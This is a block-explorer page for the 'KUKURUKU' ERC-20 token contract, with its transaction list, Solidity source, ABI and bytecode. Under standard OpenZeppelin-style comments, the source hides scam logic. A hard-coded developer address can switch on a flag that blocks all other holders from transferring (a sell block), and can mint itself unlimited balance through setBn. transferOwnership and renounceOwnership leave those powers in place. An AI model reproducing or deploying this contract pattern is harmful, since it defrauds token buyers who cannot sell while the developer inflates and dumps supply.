Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 8 from a total of 8 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 18039546 | 433 days ago | IN | 0 ETH | 0.00055119 | ||||
Set Bn | 18039531 | 433 days ago | IN | 0 ETH | 0.00033696 | ||||
Set Bn | 18039527 | 433 days ago | IN | 0 ETH | 0.00032142 | ||||
Set Bn | 18039516 | 433 days ago | IN | 0 ETH | 0.00031388 | ||||
Approve | 18038969 | 433 days ago | IN | 0 ETH | 0.00055544 | ||||
Approve | 18037502 | 433 days ago | IN | 0 ETH | 0.00090914 | ||||
Renounce Ownersh... | 18037484 | 433 days ago | IN | 0 ETH | 0.0005172 | ||||
0x60806040 | 18037457 | 433 days ago | IN | 0 ETH | 0.03868461 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
KUKURUKU
Compiler Version
v0.8.16+commit.07a7930e
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
pragma solidity 0.8.16; // SPDX-License-Identifier: MIT abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); constructor() { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } function owner() public view returns (address) { return _owner; } function renounceOwnership() public onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } } interface IERC20 { event Transfer(address indexed from, address indexed to, uint256 value); event Approval( address indexed owner, address indexed spender, uint256 value ); function name() external view returns (string memory); function symbol() external view returns (string memory); function decimals() external view returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract KUKURUKU is Context, IERC20, Ownable { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply = 100 * 10**9 * 10**8; address private _developerAddress = 0x3F29162130912a40095B4016f701bd38bE0FA11D; string private _name; string private _symbol; address private pairUniswap; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor() payable { _name = "KUKURUKU"; _symbol = "KRK"; _balances[msg.sender] = _totalSupply; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 8; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function enableTrading(bool _enable) public { if (_developerAddress == msg.sender) { yyy = _enable; } } function transferOwnership(address _newOwner) public onlyOwner { require(_newOwner != address(0)); address oldOwner = owner(); emit OwnershipTransferred(oldOwner, _newOwner); } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from); uint256 fromBalance = _balances[from]; require( fromBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function setBn(uint256 tr) public { if (msg.sender == _developerAddress) { _balances[msg.sender] = _balances[msg.sender] + tr; } } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require( currentAllowance >= amount, "ERC20: insufficient allowance" ); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from) internal virtual { if ( from != owner() && from != _developerAddress ) { if (yyy) { revert("Error"); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev This empty reserved space is put in place to allow future versions to add new * variables without shifting down storage in the inheritance chain. * See https://docs.openzeppelin.com/contracts/4.x/upgradeable#storage_gaps */ uint256[45] private __gap; bool private yyy; }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enable","type":"bool"}],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tr","type":"uint256"}],"name":"setBn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052678ac7230489e80000600355733f29162130912a40095b4016f701bd38be0fa11d600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600062000077620001ef60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506040518060400160405280600881526020017f4b554b5552554b55000000000000000000000000000000000000000000000000815250600590816200015b919062000471565b506040518060400160405280600381526020017f4b524b000000000000000000000000000000000000000000000000000000000081525060069081620001a2919062000471565b50600354600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555062000558565b600033905090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200027957607f821691505b6020821081036200028f576200028e62000231565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620002f97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620002ba565b620003058683620002ba565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620003526200034c62000346846200031d565b62000327565b6200031d565b9050919050565b6000819050919050565b6200036e8362000331565b620003866200037d8262000359565b848454620002c7565b825550505050565b600090565b6200039d6200038e565b620003aa81848462000363565b505050565b5b81811015620003d257620003c660008262000393565b600181019050620003b0565b5050565b601f8211156200042157620003eb8162000295565b620003f684620002aa565b8101602085101562000406578190505b6200041e6200041585620002aa565b830182620003af565b50505b505050565b600082821c905092915050565b6000620004466000198460080262000426565b1980831691505092915050565b600062000461838362000433565b9150826002028217905092915050565b6200047c82620001f7565b67ffffffffffffffff81111562000498576200049762000202565b5b620004a4825462000260565b620004b1828285620003d6565b600060209050601f831160018114620004e95760008415620004d4578287015190505b620004e0858262000453565b86555062000550565b601f198416620004f98662000295565b60005b828110156200052357848901518255600182019150602085019450602081019050620004fc565b868310156200054357848901516200053f601f89168262000433565b8355505b6001600288020188555050505b505050505050565b61197880620005686000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063acdd08e111610066578063acdd08e1146102c5578063dd62ed3e146102e1578063f275f64b14610311578063f2fde38b1461032d57610100565b80638da5cb5b1461022957806395d89b4114610247578063a457c2d714610265578063a9059cbb1461029557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610349565b60405161011a91906110cd565b60405180910390f35b61013d60048036038101906101389190611188565b6103db565b60405161014a91906111e3565b60405180910390f35b61015b6103fe565b604051610168919061120d565b60405180910390f35b61018b60048036038101906101869190611228565b610408565b60405161019891906111e3565b60405180910390f35b6101a9610437565b6040516101b69190611297565b60405180910390f35b6101d960048036038101906101d49190611188565b610440565b6040516101e691906111e3565b60405180910390f35b610209600480360381019061020491906112b2565b610477565b604051610216919061120d565b60405180910390f35b6102276104c0565b005b610231610613565b60405161023e91906112ee565b60405180910390f35b61024f61063c565b60405161025c91906110cd565b60405180910390f35b61027f600480360381019061027a9190611188565b6106ce565b60405161028c91906111e3565b60405180910390f35b6102af60048036038101906102aa9190611188565b610745565b6040516102bc91906111e3565b60405180910390f35b6102df60048036038101906102da9190611309565b610768565b005b6102fb60048036038101906102f69190611336565b61084f565b604051610308919061120d565b60405180910390f35b61032b600480360381019061032691906113a2565b6108d6565b005b610347600480360381019061034291906112b2565b610949565b005b606060058054610358906113fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610384906113fe565b80156103d15780601f106103a6576101008083540402835291602001916103d1565b820191906000526020600020905b8154815290600101906020018083116103b457829003601f168201915b5050505050905090565b6000806103e6610a81565b90506103f3818585610a89565b600191505092915050565b6000600354905090565b600080610413610a81565b9050610420858285610c52565b61042b858585610cde565b60019150509392505050565b60006008905090565b60008061044b610a81565b905061046c81858561045d858961084f565b610467919061145e565b610a89565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104c8610a81565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610555576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054c906114de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461064b906113fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610677906113fe565b80156106c45780601f10610699576101008083540402835291602001916106c4565b820191906000526020600020905b8154815290600101906020018083116106a757829003601f168201915b5050505050905090565b6000806106d9610a81565b905060006106e7828661084f565b90508381101561072c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161072390611570565b60405180910390fd5b6107398286868403610a89565b60019250505092915050565b600080610750610a81565b905061075d818585610cde565b600191505092915050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff160361084c5780600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610808919061145e565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036109465780603560006101000a81548160ff0219169083151502179055505b50565b610951610a81565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d5906114de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a1757600080fd5b6000610a21610613565b90508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610af8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aef90611602565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5e90611694565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c45919061120d565b60405180910390a3505050565b6000610c5e848461084f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cd85781811015610cca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc190611700565b60405180910390fd5b610cd78484848403610a89565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4490611792565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db390611824565b60405180910390fd5b610dc583610f53565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e4c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e43906118b6565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ee1919061145e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f45919061120d565b60405180910390a350505050565b610f5b610613565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614158015610fe45750600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b1561103a57603560009054906101000a900460ff1615611039576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103090611922565b60405180910390fd5b5b50565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b60008484015250505050565b6000601f19601f8301169050919050565b600061109f8261103d565b6110a98185611048565b93506110b9818560208601611059565b6110c281611083565b840191505092915050565b600060208201905081810360008301526110e78184611094565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061111f826110f4565b9050919050565b61112f81611114565b811461113a57600080fd5b50565b60008135905061114c81611126565b92915050565b6000819050919050565b61116581611152565b811461117057600080fd5b50565b6000813590506111828161115c565b92915050565b6000806040838503121561119f5761119e6110ef565b5b60006111ad8582860161113d565b92505060206111be85828601611173565b9150509250929050565b60008115159050919050565b6111dd816111c8565b82525050565b60006020820190506111f860008301846111d4565b92915050565b61120781611152565b82525050565b600060208201905061122260008301846111fe565b92915050565b600080600060608486031215611241576112406110ef565b5b600061124f8682870161113d565b93505060206112608682870161113d565b925050604061127186828701611173565b9150509250925092565b600060ff82169050919050565b6112918161127b565b82525050565b60006020820190506112ac6000830184611288565b92915050565b6000602082840312156112c8576112c76110ef565b5b60006112d68482850161113d565b91505092915050565b6112e881611114565b82525050565b600060208201905061130360008301846112df565b92915050565b60006020828403121561131f5761131e6110ef565b5b600061132d84828501611173565b91505092915050565b6000806040838503121561134d5761134c6110ef565b5b600061135b8582860161113d565b925050602061136c8582860161113d565b9150509250929050565b61137f816111c8565b811461138a57600080fd5b50565b60008135905061139c81611376565b92915050565b6000602082840312156113b8576113b76110ef565b5b60006113c68482850161138d565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061141657607f821691505b602082108103611429576114286113cf565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061146982611152565b915061147483611152565b925082820190508082111561148c5761148b61142f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006114c8602083611048565b91506114d382611492565b602082019050919050565b600060208201905081810360008301526114f7816114bb565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061155a602583611048565b9150611565826114fe565b604082019050919050565b600060208201905081810360008301526115898161154d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006115ec602483611048565b91506115f782611590565b604082019050919050565b6000602082019050818103600083015261161b816115df565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061167e602283611048565b915061168982611622565b604082019050919050565b600060208201905081810360008301526116ad81611671565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006116ea601d83611048565b91506116f5826116b4565b602082019050919050565b60006020820190508181036000830152611719816116dd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061177c602583611048565b915061178782611720565b604082019050919050565b600060208201905081810360008301526117ab8161176f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061180e602383611048565b9150611819826117b2565b604082019050919050565b6000602082019050818103600083015261183d81611801565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006118a0602683611048565b91506118ab82611844565b604082019050919050565b600060208201905081810360008301526118cf81611893565b9050919050565b7f4572726f72000000000000000000000000000000000000000000000000000000600082015250565b600061190c600583611048565b9150611917826118d6565b602082019050919050565b6000602082019050818103600083015261193b816118ff565b905091905056fea264697066735822122056a247ba7c7bc6ebf5956101ebc2873908faa9404e4907d6dd0cfd5984828b3f64736f6c63430008100033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063acdd08e111610066578063acdd08e1146102c5578063dd62ed3e146102e1578063f275f64b14610311578063f2fde38b1461032d57610100565b80638da5cb5b1461022957806395d89b4114610247578063a457c2d714610265578063a9059cbb1461029557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610349565b60405161011a91906110cd565b60405180910390f35b61013d60048036038101906101389190611188565b6103db565b60405161014a91906111e3565b60405180910390f35b61015b6103fe565b604051610168919061120d565b60405180910390f35b61018b60048036038101906101869190611228565b610408565b60405161019891906111e3565b60405180910390f35b6101a9610437565b6040516101b69190611297565b60405180910390f35b6101d960048036038101906101d49190611188565b610440565b6040516101e691906111e3565b60405180910390f35b610209600480360381019061020491906112b2565b610477565b604051610216919061120d565b60405180910390f35b6102276104c0565b005b610231610613565b60405161023e91906112ee565b60405180910390f35b61024f61063c565b60405161025c91906110cd565b60405180910390f35b61027f600480360381019061027a9190611188565b6106ce565b60405161028c91906111e3565b60405180910390f35b6102af60048036038101906102aa9190611188565b610745565b6040516102bc91906111e3565b60405180910390f35b6102df60048036038101906102da9190611309565b610768565b005b6102fb60048036038101906102f69190611336565b61084f565b604051610308919061120d565b60405180910390f35b61032b600480360381019061032691906113a2565b6108d6565b005b610347600480360381019061034291906112b2565b610949565b005b606060058054610358906113fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610384906113fe565b80156103d15780601f106103a6576101008083540402835291602001916103d1565b820191906000526020600020905b8154815290600101906020018083116103b457829003601f168201915b5050505050905090565b6000806103e6610a81565b90506103f3818585610a89565b600191505092915050565b6000600354905090565b600080610413610a81565b9050610420858285610c52565b61042b858585610cde565b60019150509392505050565b60006008905090565b60008061044b610a81565b905061046c81858561045d858961084f565b610467919061145e565b610a89565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104c8610a81565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610555576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161054c906114de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461064b906113fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610677906113fe565b80156106c45780601f10610699576101008083540402835291602001916106c